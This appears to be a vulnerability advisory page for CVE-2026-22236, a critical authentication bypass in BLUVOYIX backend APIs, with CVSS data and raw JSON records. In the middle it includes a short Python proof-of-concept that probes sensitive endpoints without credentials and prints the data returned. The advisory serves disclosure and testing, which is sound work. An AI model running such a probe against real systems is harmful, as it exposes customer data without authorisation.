Security Vulnerability Report
CVE-2026-22236 CVSS 9.8 CRITICAL

Published: 2026-01-14 15:16:05
Last Modified: 2026-02-02 15:49:19
Source: 56a186b1-7f5e-4314-ba38-38d5499fccfd

Description

The vulnerability exists in BLUVOYIX due to improper authentication in the BLUVOYIX backend APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable APIs. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:blusparkglobal:bluvoyix:-:*:*:*:*:*:*:* - VULNERABLE
BLUVOYIX: all versions (specific versions pending vendor confirmation)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2026-22236 PoC - BLUVOYIX Authentication Bypass
# Target: BLUVOYIX Backend APIs

target_url = "https://target-server/api/v1/"


def check_vulnerability():
    """
    Check if target is vulnerable to CVE-2026-22236
    """
    # Try unauthenticated request to sensitive endpoint
    headers = {
        'User-Agent': 'Mozilla/5.0',
        'Content-Type': 'application/json',
        # Bypass attempt - missing or empty auth header
        'Authorization': ''
    }

    # Target sensitive API endpoints
    endpoints = [
        'users',
        'customers',
        'data',
        'admin/users',
        'config'
    ]

    for endpoint in endpoints:
        url = target_url + endpoint
        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            if response.status_code == 200:
                print(f"[+] VULNERABLE: {url}")
                print(f" Status: {response.status_code}")
                print(f" Response: {response.text[:500]}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")

    return False


if __name__ == "__main__":
    print("CVE-2026-22236 BLUVOYIX Authentication Bypass PoC")
    print("=" * 50)
    vulnerable = check_vulnerability()
    if vulnerable:
        print("\n[!] Target is VULNERABLE to CVE-2026-22236")
    else:
        print("\n[-] Target appears NOT vulnerable")

References

https://blusparkglobal.com/bluvoyix/ (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22236", "sourceIdentifier": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "published": "2026-01-14T15:16:04.580", "lastModified": "2026-02-02T15:49:19.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability exists in BLUVOYIX due to improper authentication in the BLUVOYIX backend APIs. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable APIs. Successful exploitation of this vulnerability could allow the attacker to gain full access to customers' data and completely compromise the targeted platform."}, {"lang": "es", "value": "La vulnerabilidad existe en BLUVOYIX debido a una autenticación incorrecta en las API de backend de BLUVOYIX. Un atacante remoto no autenticado podría explotar esta vulnerabilidad enviando solicitudes HTTP especialmente diseñadas a las API vulnerables. La explotación exitosa de esta vulnerabilidad podría permitir al atacante obtener acceso completo a los datos de los clientes y comprometer completamente la plataforma objetivo."}], "metrics": {"cvssMetricV40": [{"source": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:M/U:Red", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", 
"modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:blusparkglobal:bluvoyix:-:*:*:*:*:*:*:*", "matchCriteriaId": "84FDD5FA-DB87-4263-A7F2-C136D7F4155C"}]}]}], "references": [{"url": "https://blusparkglobal.com/bluvoyix/", "source": "56a186b1-7f5e-4314-ba38-38d5499fccfd", "tags": ["Product"]}]}}